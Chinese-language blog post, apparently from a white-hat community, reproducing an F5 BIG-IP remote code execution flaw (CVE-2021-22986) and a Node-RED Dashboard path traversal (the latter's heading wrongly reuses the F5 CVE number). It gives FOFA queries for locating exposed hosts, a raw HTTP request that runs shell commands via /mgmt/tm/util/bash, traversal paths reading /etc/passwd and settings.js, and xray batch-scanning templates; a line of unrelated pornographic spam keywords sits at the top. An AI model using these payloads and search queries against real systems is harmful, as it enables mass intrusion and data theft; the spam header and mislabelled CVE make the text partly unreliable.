四虎影院一区,天天日天天射天天操,日韩一级精品无码毛片,天天操屄,久草色香蕉视频,亚洲不卡黄色网址,色色色色五月天,翔田千里与黑人未删减avXX

作者：huluwa 編輯：白帽子社區(qū)運(yùn)營(yíng)團(tuán)隊(duì)

"白帽子社區(qū)在線(xiàn)CTF靶場(chǎng)BMZCTF，歡迎各位在這里練習(xí)、學(xué)習(xí)，BMZCTF全身心為網(wǎng)絡(luò)安全賽手提供優(yōu)質(zhì)學(xué)習(xí)環(huán)境，鏈接（http://www.bmzclub.cn/）

F5 BIG-IP 遠(yuǎn)程代碼執(zhí)行（CVE-2021-22986）

1.漏洞描述

F5 BIG-IP 存在代碼執(zhí)行漏洞，攻擊者通過(guò) BIG-IP iControl REST 接口進(jìn)行網(wǎng)絡(luò)訪問(wèn)，在構(gòu)造惡意命令完成代碼執(zhí)行，從而控制目標(biāo)機(jī)器。

2.影響版本

F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 15.1.0-15.1.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IQ 6.0.0-6.1.0

3.漏洞復(fù)現(xiàn)

FOFA查詢(xún)語(yǔ)法：icon_hash="-335242539"POC：POST /mgmt/tm/util/bash HTTP/1.1Host: IP:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests: 1Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

附xray 批量檢測(cè)腳本：

name: poc-yaml-f5-big-ip-rce-cve-2021-22986set:  r1: randomInt(800000000, 1000000000)  r2: randomInt(800000000, 1000000000)rules:  - method: POST    path: /mgmt/tm/util/bash    headers:      Content-Type: application/json      Authorization: Basic YWRtaW46QVNhc1M=      X-F5-Auth-Token: " "    body: >-      {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}    follow_redirects: false    expression: |      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))detail:  author: huluwa  links:    - https://support.f5.com/csp/article/K03009991

Node-RED 任意文件讀取漏洞（CVE-2021-22986）

1. 漏洞描述

Node-RED由于未對(duì)url中傳輸?shù)穆窂竭M(jìn)行嚴(yán)格過(guò)濾，導(dǎo)致攻擊者可構(gòu)造特殊路徑進(jìn)行任意文件讀取，比如settings.js、passwd文件等

2. 影響版本

Node-Red-Dashboard version < 2.26.2

(Node-Red插件Node-Red-Dashboard，如果未安裝此插件，或插件版本高于2.26.2，則不受影響)

3. 漏洞復(fù)現(xiàn)

FOFA查詢(xún)語(yǔ)法：title="Node-RED"POC：/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

附xray 批量檢測(cè)腳本：

name: poc-yaml-node-red-cve-2021-3223rules:  - method: GET    path: /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd    expression: |      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)detail:  author: huluwa  links:    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3223

往期精彩文章

Apereo CAS 4.1 反序列化命令執(zhí)行漏洞復(fù)現(xiàn)

漏洞復(fù)現(xiàn)合集

Spring Boot Actuator 未授權(quán)訪問(wèn)利用實(shí)戰(zhàn)利用

通達(dá)OA漏洞整理

技術(shù)支持：白帽子社區(qū)團(tuán)隊(duì)

— 掃碼關(guān)注我們 —

F5 BIG-IP & Node-RED漏洞復(fù)現(xiàn)集合